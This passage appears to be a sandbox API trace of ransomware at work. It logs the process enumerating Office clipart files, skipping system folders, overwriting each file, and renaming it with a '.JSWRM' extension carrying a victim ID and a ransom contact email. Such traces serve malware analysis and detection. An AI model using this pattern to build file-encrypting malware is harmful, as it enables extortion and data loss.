CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0081.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0081.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0081.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0081.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0081.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.055] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0081.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0081.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.056] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x305c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105368.WMF", cAlternateFileName="")) returned 1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2=".") returned 1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="..") returned 1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="...") returned 1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="windows") returned -1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="recovery") returned -1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="perflogs") returned -1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="documents and settings") returned 1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="system volume information") returned -1 [0081.056] lstrcmpiW (lpString1="J0105368.WMF", lpString2="msocache") returned -1 [0081.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0081.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105368.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105368.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105368.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0081.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0081.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105368.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105368.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105368.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0081.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0081.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.057] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12380) returned 1 [0081.057] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3050) returned 0x24d210 [0081.057] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3050, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3050, lpOverlapped=0x0) returned 1 [0081.059] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.059] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3050, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3050, lpOverlapped=0x0) returned 1 [0081.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.059] CloseHandle (hObject=0x314) returned 1 [0081.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0081.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0081.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0081.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0081.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0081.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.060] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0081.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.064] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1364, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105376.WMF", cAlternateFileName="")) returned 1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2=".") returned 1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="..") returned 1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="...") returned 1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="windows") returned -1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="recovery") returned -1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="perflogs") returned -1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="documents and settings") returned 1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="system volume information") returned -1 [0081.064] lstrcmpiW (lpString1="J0105376.WMF", lpString2="msocache") returned -1 [0081.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0081.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105376.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105376.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105376.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0081.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0081.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105376.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105376.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105376.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0081.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0081.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.065] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4964) returned 1 [0081.065] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1360) returned 0x205850 [0081.066] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1360, lpOverlapped=0x0) returned 1 [0081.067] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.067] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1360, lpOverlapped=0x0) returned 1 [0081.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.068] CloseHandle (hObject=0x314) returned 1 [0081.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0081.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0081.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0081.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0081.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0081.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0081.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.068] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0081.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0081.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.069] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1364, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105378.WMF", cAlternateFileName="")) returned 1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2=".") returned 1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="..") returned 1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="...") returned 1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="windows") returned -1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="recovery") returned -1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="perflogs") returned -1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="documents and settings") returned 1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="system volume information") returned -1 [0081.069] lstrcmpiW (lpString1="J0105378.WMF", lpString2="msocache") returned -1 [0081.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105378.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105378.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105378.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105378.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105378.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105378.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0081.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.070] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4964) returned 1 [0081.070] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1360) returned 0x205850 [0081.070] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1360, lpOverlapped=0x0) returned 1 [0081.072] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.072] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1360, lpOverlapped=0x0) returned 1 [0081.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.072] CloseHandle (hObject=0x314) returned 1 [0081.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0081.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0081.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0081.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0081.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0081.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.072] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0081.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0081.073] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1210, 